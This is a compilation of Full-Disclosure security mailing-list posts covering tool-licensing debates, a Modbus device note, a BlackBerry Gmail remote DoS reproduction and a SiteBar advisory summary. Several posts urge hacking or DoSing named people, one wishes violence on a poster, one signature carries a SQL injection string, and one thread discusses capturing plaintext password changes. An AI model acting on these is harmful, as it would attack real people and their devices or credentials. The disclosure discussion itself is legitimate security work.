think its connected to this conflict, maybe just a coincidence: http://www.pcworld.com/businesscenter/article/154544/feuding_india_pakistani_hackers_deface_web_sites.html Thanks. I'm looking into this and will report on any further info. -- MC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ http://www.jewelerslounge.com/liberty-coin-cufflinks -- I'm your best best friend. Usually I like it when you contradict me, it might help me learn. Just don't be so angry. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Lazy bum approach to security
Hi I agree with you. It's just these 'underground communities' tend to be a bunch of kiddies playing with milworm, bots, and asking help with basic programming. Where's the original ideas, the research, and the worth-while discussion? I guess I described an extreme scenario, but you get the picture. Really, tell me. If there was a friendly, 'academic'(as aposed to 'business-like') online community then show me, I'd join up in a flash. -- I'm your best best friend. Usually I like it when you contradict me, it might help me learn. Just don't be so angry. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security industry software license
Just to summarise what's been said and what I think so we can get back on topic, and conclude something: No-one hacks using metasploit! Go back to 2003. Terrorists with metasploit! What to you have a picture in your head of Mr. Jihad Bigbeard using metasploit to shutdown a powergrid? Reasons Why It's Hard to archive: - It violates freedom. - It's hard to enforce without: invading privacy, expending too much money/resources. - Most writers of these tools won't want to have to do this (most writers of security tools are hackers, you-know: back orifice, pinch, exploit kits, phising kits, malware creation kits, the entire contents of milworm, bots, THCs Hydra... it goes on. - Geographical constraints. All governments doing the exact same thing at the same time? Or one organisation forcing it onto the net (with no power to put people in jail or anything). - You cant/shouldn't moderate the internet. Reasons Why It's Pointlessly ineffective: - Piratebay. - People writing tools intended for hackers. - The massive number of tools that you'd have to moderate to be effective. - If not everything is a dangerous security tool then it's reduced in effectiveness. - Most big hacks you see don't take many tools. Like a big database being dumped with a browser/scripts. - You don't solve the problem, at all. Maybe reduce it a little. Reasons Why It Wouldn't Happen: - Most developed western governments like to keep they're 1984 I'm watching you crap behind the curtains. - Most governments only do these things because something bad happened and they have to make up a law to cover their asses, or something bigger than your rapidshare passes is at stake. - I'd protest - I'd go to my countries(UK) capital and march in protest! Reasons Why It Sucks: - It violates freedom (programs are intellectual property - you can't do that kind of thing to them and call it nice). - It would ruin the internet and break a load of enthusiastic geeks' harts. - It would force the underground hackers deeper underground. - It would discourage security professionals. Pointless things that people mentioned that made them look like a child in front of a shit load of subscribers: - Personal comments. - Attacks at the way someone writes something instead of what they write about. Questions for to think about/answer: - Would you deserve a license. Really? (me: NO!) - Would you wish you had one. (me; yeh!) - How many of the tools that'd be outlawed have you already written an equivalent of? (me: loads). - If you had to outlaw things, would you outlaw tor? (me: I don't wanna!) It's a silly idea. Final Question: - Are we finished? Is it over? Is it established that it's a bad idea now? -- I'm your best best friend. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
It's futile trying to use the law to change things. It will simply force people into the shadows. Which today involves using tor and some Russian web money account. I read a slogan from before my time, in a book: If source is outlawed outlaws will have source - same applies to zero days. Anyway I don't think it should be Illegal. I own a set of lock picks - I don't intend to break into someone's house. And if I did I'd go to jail (for the burglary and being equipped with picks), untill then I'm innocent. The UKs law has an attitude like that - I like it! Resources should go into actually preventing crimes taking place. Not stumbling around hoping that making it awkward for criminals to get the tools they need will make a difference. Simon. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] scada/plc gear
There's a ton of information on the Internet for Schneider/Modicon's modbus protocol, including modbus+., modbusrtu, and modbustcp... Specs are freely available http://www.modbus.org/docs/Modbus_Application_Protocol_V1_1b.pdf. If you spend 2 minutes with google you'll find more then you'll need. For example: http://www.modbus.pl/download/zxy66/v19/modbus_perl_client.zip. Anyways, enjoy your research... On Jan 5, 2008 1:01 PM, gmaggro [EMAIL PROTECTED] wrote: OK, having done some digging a decent little chunk of industrial automation gear has started coming my way; 1 of 6 pieces. All totaled, roughly under $1000. Small standalone stuff for now; the shipping on populated PLC chassis like SLC-500 stuff is problematic. If people have specific technical questions, want a script run against a piece of gear or a custom protocol capture done I will entertain such requests. I am also willing to open the cases and pick up the soldering iron, attempt rom/firmware dumps, etc. Are there any particular tests or tools someone would like me to work into my routine right from the start? Hardware piece #1 is a Kohler Power Systems modbus/ethernet converter, pn# GM40165. So far, nmap (4.52) has been detecting the modbus running on port 502/tcp as asa-appl-proto. There is not a great deal of information out there about this protocol. The email contact associated with the port in some /etc/services files ([EMAIL PROTECTED]) is disabled, and the domain redirects to an industrial automation company (telemecanique.com). Running/OS details indicate Enerdis or Lantronix embedded. MAC prefix is 00:20:4A (Pronet Gmbh). I suppose I could have just posted the nmap output, but figured that might annoy people unduly. Perhaps it would be worth renaming 'asa-appl-proto' on 502 to 'modbus' or something related? Just a suggestion to make it clearer for some people. In any case, this is mitigated by scanning with the -C option which grabs info from 80 and 161 clearly identifying it as being a modbus related device, the sysDescr stating Modbus/TCP to RTU Bridge. And oh yeah, it has a wide open text configuration interface on . Handy/Interesting modbus tcp/udp links: http://jamod.sourceforge.net/development/tcp_master_howto.html http://jamod.sourceforge.net/kbase/protocol.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan-vs-USERS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, 02 Nov 2007 00:09:33 -0400 RMueller [EMAIL PROTECTED] wrote: of there OS. Move a folder and all programs are gone! Regardless their Or, can we educate? trying. thanks np. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcrQ3AACgkQqTTbVuUWvbKEgwQAtg1F9Jncgz/xE7mqMq3h5gD1co5D QfhuqIs7el9ecc18IMfg1I6JugE0RTFCtNvPpEAI1L8pTGvCHFgTiZ437M6i68Nm5rOB gIk6zvw2yX4CeFxucn4c9759QYnp6NFGBJLpvnME4zOKTX86plLcznh56NxScPGE+FJe OsL/KQ0= =YVi8 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IRM Discover More Vulnerabilities in Cisco IOS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 shut up pdp On Tue, 23 Oct 2007 14:31:52 -0400 reepex [EMAIL PROTECTED] wrote: Bug 1: The Line Printer Daemon, which provides print server functionality in Cisco IOS is vulnerable to a software flaw whereby the length of the hostname of the router is not checked before being copied into a fixed size memory buffer. . However, the attacker must be able to control the hostname of the router, which could be achieved via SNMP. Ok... so for this remote attack the victim would need a badly configured snmp listening public... ok pdp architect --- Bug 2: Cisco say its cross-site scripting Ok you are still stealing pdp architect's research --- Bug 3-7,10-15 Local attacks on a cisco - lulz Not even pdp would go this low --- Bug 8,9: no info - im sure its elite though Having a bug but releasing no info - sounds like drraid and pdp architec to me - so basically you found a bunch of local bugs in ciscos and a bug if you can control snmp - way to go - your grep -r strcpy * skills are quiet strong. Eeye and idefense would glady hire you. Do you wonder why you found 12 bugs and get no press but michael lynn finds a couple and cisco is throwing lawyers and lawsuits at him? - -- its probably because his mattered and yours are a joke - just like you and your company. On 10/23/07, Andy Davis [EMAIL PROTECTED] wrote: In the last three months IRM has discovered a total of 13 new security vulnerabilities in Cisco IOS. These vulnerabilities were reported to Cisco and have all been allocated PSIRT reference numbers while the root cause and potential impact of each is investigated. Cisco has taken all the vulnerability reports extremely seriously and has already started releasing patches and workarounds to mitigate them (e.g. http://www.cisco.com/warp/public/707/cisco-sr-20071010- lpd.shtml). As the remaining patches or workarounds are developed, IRM will release security advisories, which will include full technical details of each vulnerability and links to patch download information. More information about the new vulnerabilities discovered is available here: http://www.irmplc.com/index.php/111-Vendor-Alerts ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkceQBUACgkQqTTbVuUWvbLNnwQAlOLcbkRkqv4Ainy6ZfISAsTR3wXl rxUvX+C5qRS4NW/lZ55e1wHe2GDt3gpfpstIKwTbnt/N6FqGDNFx6UO/KyjHY8sRc058 RSi9uGiWviRS35j9RBMj+44z1rMDnfATvcJ2YUsLdStjmMg2zuCkas205NA/PQEO0422 TR3IbsQ= =VYiE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Madness? This is KWICKFIX!!!!!!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I did not get this spam. Perhaps my internet relay mail provider does a better job of xss firewalling me from spam. On Sat, 20 Oct 2007 15:27:57 -0400 phioust [EMAIL PROTECTED] wrote: did anyone else get this? I am only signed up for this list so I figured it was 'targetted spam' On 10/20/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Have you searched the internet countless times looking for a way to hack? Maybe you have searched for a way to download programs, games, or movies for free? Or maybe you have searched for a friendly, helpful, community that offers all that plus more? Well search no more, you have struck gold. Well not quite gold, better… Kwickfix.org! Here at Kwickfix.org we have forums for countless discussions to be held daily. We have a 'warez' section with endless amounts of safe secure downloads for your favorite TV shows, Movies, Games, Programs, and more. But what we really are known for is not our download section, but our notorious underground hacking section. Hack online games, your friends, and get passwords to any site! We offer numerous easy to follow tutorials and programs for you to become a 'hacker' in no time. Don't believe us? Why not come to Kwickfix.org and see for yourself. Stuck on a problem? Ask any of our staff members or a tech genius member. Thanks, The Kwickfix Management -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcaWZQACgkQqTTbVuUWvbITTwQAnoA10GSOxJ1qkRoQ3YmOeCpB18F9 PbWhRC6I84iy577AjJrCW11nVgW6YlClpQWhU7jE1nUpD3Eked+nVQw9xxVIuAONfseK RsOsAaXpWAqjmV9ybjAuGLMjuYuQKDg4qV1p+KTYxuY0077DuHGjbGnn5M7h1T622kgj 09Nnn5M= =S3G/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cross Site Hacking Browser Injection Attack Vulnerability Paradigms
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello friends, I am a PhD student writing my dissertation on cross site scripting related attacks, which I have learned is the true Achilles heel of Intraweb exploration technologies. One detail I am unable to find with the assistance of the Internet Wayback machine is when and what browsers first introduced these vulnerabilities. So, 1) What browser was first vulnerable to these attacks, 2) Who was the responsible developer, 3) How was this vulnerable mechanism replicated across all modern browsers, 4) Instead of patching individual XSS problems in random web-based piano tuning software, why aren't the serious security researchers[1] of this list working to develop better technologies to block the entire vulnerability class, like the PaX/w^x team has done[2], to raise the ante for computer security list posters around the world? Thanks for your help in advance. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcaWxwACgkQqTTbVuUWvbLPGgQAlzDzl4PTINCvlRdco/1zocWJbJyg CGfRjA6joWhUeRSwfeGvoNnulX3RbXLYePYcvrspZmVrM0mzj4q+tUCPm7Sh0eKfgof/ NvZWCwVKOsaDTNZSgR7yS3QYJ3R+ekdQi/3nYz61iUFFBkbqi+F8KAQmAGtIcOQgp1EN R093Phw= =43if -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cross Site Hacking Browser Injection Attack Vulnerability Paradigms
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 lol what a blonde i forgot my citations one second [1] http://www.gnucitizen.org [2] http://pax.grsecurity.net Thanks! On Sat, 20 Oct 2007 15:46:36 -0400 [EMAIL PROTECTED] wrote: Hello friends, I am a PhD student writing my dissertation on cross site scripting related attacks, which I have learned is the true Achilles heel of Intraweb exploration technologies. One detail I am unable to find with the assistance of the Internet Wayback machine is when and what browsers first introduced these vulnerabilities. So, 1) What browser was first vulnerable to these attacks, 2) Who was the responsible developer, 3) How was this vulnerable mechanism replicated across all modern browsers, 4) Instead of patching individual XSS problems in random web-based piano tuning software, why aren't the serious security researchers[1] of this list working to develop better technologies to block the entire vulnerability class, like the PaX/w^x team has done[2], to raise the ante for computer security list posters around the world? Thanks for your help in advance. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcaW40ACgkQqTTbVuUWvbIJCQP/V1jGj8znRU91cQc1gdWR1geWuHhe A9hC5dvqDtmLGrk7JvY4LHgZ55Ojv95tW+renUMKIX5+UiDveVZ5mo/xX4d0yERCqfWd 1FuAhYrtgbvDL+kSqmvV5sybp57XQDHterOcf75fputd2rALDzDUKVfNE1rMqFdlEQOt NKmij48= =6Q4d -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Marc Vilanova Vilasero está ause nte de la oficina.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Someone hack this guy. - -JPauthority On Fri, 19 Oct 2007 10:01:27 -0400 Marc Vilanova Vilasero [EMAIL PROTECTED] wrote: Estaré ausente de la oficina desde el 19/10/2007 y no volveré hasta el 26/10/2007. Responderé a su mensaje cuando regrese. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYxDcACgkQqTTbVuUWvbJUOQP/cV6b90onANueNdD179HTPkw3EyE7 4AqPjwfDEp9IGcPVZX0epGcWI/NR66LB482IM0+KImEDonFQ7FelHZz5ycHAkW2VZ6Ln 8Ex6rYeH2BRRbyXSyFdyYmZhP5U265z1L5Wos8pw6W/eSPzcN/syPTt3XLzXzYWeUgiJ SZqG0y4= =UI6Z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PhD Power in Efffect
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://www.securityfocus.com/columnists/455 Luckily he is only a PhD student. If anyone awards him a PhD it will severely discredit the academic institution! - -JPiwishsomeonemadethatmistakeonme -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYsYgACgkQqTTbVuUWvbKKHQP+MNlNm9BCiLVlRatH2WRUsz7QrVe/ fyp5Pd1NuoF+EEqy4v5+HVsQyxsfmra1McbG5e71r60QvP+hrWUsDSfwLaZkBTYFt7zz F8pOP0fM6PsY1MVAVkKRkcIZrIzk60akuXNzdvKw0yio2Ug8/92eTlemnSFcHeYxxOMZ 6UW9omA= =RSul -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netgear SSL312 XSS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear 3APAPA, English is the preferred language of this list. I hope the FSB shoots you. - -JPhopes the FSB kills 3APAPA On Fri, 19 Oct 2007 06:04:31 -0400 jpk [EMAIL PROTECTED] wrote: [EMAIL PROTECTED] schrieb: What? One word replies are unnecessary on the full-disclosure. Please visit http://lists.grok.org.uk/pipermail/full-disclosure/2007- October/066799.html for more information. :p -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYr64ACgkQqTTbVuUWvbLLEQP9HiwpHyBxZSpUMFeuzMFmLEZcm79b b6p0vp73Gwr/ys6crFx5TbaHDo9BU8OAgfQmnp7PuNIiNs2I/fiQ29SSEJ8m0IxfSkjq 0Ip8/UXr41Sdt88fgRCh/BCCrvAlt8ggscNthIxRa1SPaBTxnA2dFYIwJ8iKJHWoQd5h lDUYUH0= =Y0WG -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netgear SSL312 XSS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 LOL! - -JPuncreative today On Thu, 18 Oct 2007 13:06:25 -0400 Lolek of TK53 [EMAIL PROTECTED] wrote: Yoyo, On 10/17/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Dear SkyOut, dear Packetstorm team (tedd :)) and dear List. The author brocke a NDA during the releasing of this uber- Advisory. Skyout: What the fuck is wrong with u? Even ignoring our mails... wow? We provided the Router, told him to take a look and he angreed to a NDA. Do I care if you release a XSS? Hell no... But I care if you accapted a NDA because of other internal things. Did you found it by yourself? Well not realy... (We provided a router, told you to take a look for XSS) Is it uber-critical? Lol whoever you are, you are going to do an NDA for an XSS in a router firmware web interface? I fail to see a real security issue ;D Cheers Lolek ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYrsAACgkQqTTbVuUWvbIvnwQAoI4dwOtHt5KAd3rRB2SA2Lcxf6ec dRq9nOa5XfnGwIO7x1GbEGsCLRT3gVDSEb7ep+5WUNiGOyQqWbYA4X+oM/8xIS7OVRJi KUtuXM0RQAh+hRTs1PEu6RpCPdk6lCclfWRCGMoWEBW+V+fG/p49BmvTAh7MeCTflred tiYwqpk= =H+ls -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 1.1.0 for BlackBerry remote DoS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Anyone have Geoff's gmail address? - -JPgetting malicious On Fri, 19 Oct 2007 04:39:44 -0400 Kristian Erik Hermansen [EMAIL PROTECTED] wrote: I have tested and confirmed this bug on a BlackBerry 8700c in a repeatable fashion. Three outcomes are common (so may be race condition)... 1) Entire BlackBerry OS freeze. (On soft-reboot, you will see the uncaught Java exception for Gmail app) 2) Gmail freezes for some time, and then OS can recover (Gmail not responding, and killed) 3) Or no DoS at all (if you are lucky) Here is the message you will get... Uncaught exception: Application gm_8700_v4_0_L1(147) is not responding; process terminated The way I have commonly invoked this is to send an email of at least 20k in size to Exchange-synced email address on the same device. If the user has Gmail account open, it is more likely to go into DoS condition if you are composing an email or replying to a large thread. Maybe this is due to Gmail trying to auto-save the draft at the same time and hanging? Also, how is the hacker community debugging BlackBerry apps for security issues? ie, can I remotely debug the processes via USB on the 8700c? Thanks in advance... PS -- Oh, I just thought that since we are talking about BlackBerry, I should mention another funny bug, but not a security issue. It has to do with multi-byte character manipulation... Tested on 8700c v4.2.1.96 (Platform 2.3.0.79). Follow these steps to reproduce the Arabic array index out of bounds exception when making a phone call... Home - Settings - Options - Language - Change Option - Arabic (funky chars, top item in list) - Save Home - [do this next part quickly] tap 9, tap 0 quickly twice, while char is still highlighted tap DEL. Uncaught exception: java.lang.StringIndexOutOfBoundsException -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYrkkACgkQqTTbVuUWvbIQcAP/RA3MyK7nmughIBj58/HYDkUl8WKZ hJ2V3g1FoB+34FY3J+TK6HcUl1Fk22wACOfSMVA2bkyk0CW3CFVNIvKfhtyhu74TWacO gU+rvSU8tLdOH0II4tR5Ob84wEh6ADQ3lUZFQxrj4SUdz/Vv5q6PUF5M7xpuaJN+j3sh AQnOlmk= =sQ5c -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] password plugin for linux?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Wow. Most *constructive* comment you have ever made in your history of security mailing list participation. And you still suck. - -JPhates vladis On Thu, 18 Oct 2007 16:35:22 -0400 [EMAIL PROTECTED] wrote: On Thu, 18 Oct 2007 10:11:24 CDT, . / said: naive question - but you know how i can load password plugins in window's to capture password changes in the clear. is there any way to achieve the same in linux? atm all i can think of (naively as i said) is to monitor the shadow file or whatever and then insert fav technique here to open the hash. but i am really trying to achieve a near realtime understanding of password changes on the system side, so i can sync them out to apps or systems or whatever. Modifying pam_cracklib to do what you want is probably a good place to start. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYrncACgkQqTTbVuUWvbLegwP+Kb5/SDsCS58pcNTZ6PYiAS3EQVXB kORPODxvdXZRX8nr/qhuukoc8bqq1YKgJyx7udb3+8GvquzopLDDaNrC3VRyao5sjtFS yd8kFa0Nex1PweCkoCaGICXiCXVqA0OI5HkUsbrdG7aJkM9RFx6y8g33nMccfXkrqlyw hPnmVyY= =/fem -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Creative spam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear 3APAPA, This list is for security related matters only. - -JPhas a computer On Fri, 19 Oct 2007 07:43:02 -0400 S/U/N [EMAIL PROTECTED] wrote: /!\ NOT properly a security topic /!\ Received a very strange spam ( 1st with MP3 attached ) The files seems harmless, until you listen to it: It takes you back to the beat Generation experiments on consciousness. The file: http://www.mediafire.com/?5ljtvtvq9xt //- - From - Fri Oct 19 13:24:06 2007 Return-Path: [EMAIL PROTECTED] Received: (qmail 27615 invoked from network); 18 Oct 2007 19:48:36 - +++ From: Hilda Hull [EMAIL PROTECTED] To: XXX Subject: Re: Date: Thu, 18 Oct 2007 15:48:15 -0400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary==_NextPart_000_001C_01C8119E.4B8B8980 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Antivirus-Status: Clean --=_NextPart_000_001C_01C8119E.4B8B8980 Content-Type: multipart/alternative; boundary==_NextPart_001_001D_01C8119E.4B8FA830 --=_NextPart_001_001D_01C8119E.4B8FA830 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --=_NextPart_001_001D_01C8119E.4B8FA830 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN HTMLHEAD META http-equiv=3DContent-Type content=3Dtext/html; = charset=3Diso-8859-1 META content=3DMSHTML 6.00.2800.1106 name=3DGENERATOR STYLE/STYLE /HEAD BODY bgColor=3D#ff DIVFONT face=3DArial size=3D2/FONTnbsp;/DIV/BODY/HTML --=_NextPart_001_001D_01C8119E.4B8FA830-- --=_NextPart_000_001C_01C8119E.4B8B8980 Content-Type: audio/mpeg; name=moreringers.mp3 Content-Transfer-Encoding: base64 Content-Disposition: attachment; name=moreringers.mp3 //- - ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYrckACgkQqTTbVuUWvbKADwP+KHijz60i16StyUKLVSgyRFxDT6uL 9aAOPDijTaLtlBjEiq2NSYcQHE/m9XCQZaX6amUacqgyPFCkUUe8P4qIjn1bMRoSwxBk Nn6st1eq4YnlgyEur3osJ3gLWbtjwcb1SK1NNMbzFYWMdi/3mlhchZReRxeOb73eBMsL Gd4pGOs= =7GwT -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Marc Vilanova Vilasero está ause nte de la oficina.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Why are you dragging KF into this? - -JPsupports nonswearing freespeech On Fri, 19 Oct 2007 12:25:56 -0400 [EMAIL PROTECTED] wrote: On Fri, 19 Oct 2007 12:18:06 EDT, [EMAIL PROTECTED] said: Please use age appropriate language on this list. Pot. Kettle. Black. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcY3KgACgkQqTTbVuUWvbJd2gP/ahrayKZXvBdbdlvuh9Yv3KI1plRM 89ySDqOR9Mp0OrkX2j0B5nTrlitc2XmULk6dcr8UnmIhRBaT2o1l+Ky97HVlASvmAcBx fCC7a+Z4ol8SP363oqaK+bx6PMJ+3rPikD8+7u7jdrZyzi8Vousg17qns3801Sv4Rcl+ wGi59o4= =h4pm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Marc Vilanova Vilasero está ause nte de la oficina.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Please use age appropriate language on this list. Thanks. On Fri, 19 Oct 2007 08:47:33 -0400 German [EMAIL PROTECTED] wrote: Go fuck yourself In Spanish is: Andate a la mierda (not literal) Cogete/follate vos solo (literal, not used) --- Vaya usted cogiera Hmm, doesn't seem correct. Shirkdog ' or 1=1-- http://www.shirkdog.us [...] Estaré ausente de la oficina desde el 19/10/2007 y no volveré hasta el 26/10/2007. Responderé a su mensaje cuando regrese. Translated is: I take some vacations and send a mail to all my contacts. This maillist was there, so you are fucked PD: cuando vuelvas borranos de los contactos ¬¬' ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcY2L0ACgkQqTTbVuUWvbIkEAP+J+1/kX+7FsxiB78PLSG1TpONonzU 7mDYV+aoN748Vv5ekYIVwjkr6rheLfAb+ybyrQfhgkAgIS2itjDgTrqdiD+nzt2zhXNd 65CHfEf2EdF4ZcpJnMGP/clNFAJFkErG/YKW8VYb6SLlNqg/hZvtRCGEASVaBz7YXo7t eHoILag= =5jTG -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Serious holes affecting SiteBar 3.3.8
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Of course the bugs are serious, security is never a joking matter! - -JPclassic comedian On Thu, 18 Oct 2007 16:01:35 -0400 Tim Brown [EMAIL PROTECTED] dimension.org.uk wrote: All, As a result of a short security audit of SiteBar, a number of security holes were found. The holes included code execution, a malicious redirect and multiple cases of Javascript injection. After liasing with the developers, the holes have been patched. Attached are the advisory and patch relating to these flaws. CVEs open already relating to this audit: * CVE-2006-3320 (Javascript injection) - previously reported by other parties but not resolved and so included for completeness * CVE-2007-5492 (code execution) - first reported in my attached advisory to the vendor, independently rediscovered by Robert Buchholz of Gentoo whilst auditing the differences between the patched and unpatched versions (3.3.8 vs 3.3.9) * CVE-2007-5491 (file permissions issue) - apparently patched by the vendor at the same time as my issues were resolved and discovered by Robert Buchholz of Gentoo whilst auditing the differences between the patched and unpatched versions (3.3.8 vs 3.3.9) It is intended that CVE-2007-5492 will be updated to reference both code execution flaws I reported. All other issues in the advisory have been patched but no CVEs have yet been requested or assigned to the best of my knowledge. Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcYrpsACgkQqTTbVuUWvbK7bQP+IPvLoWZejlIbkRWrTujdw3L/c+bW 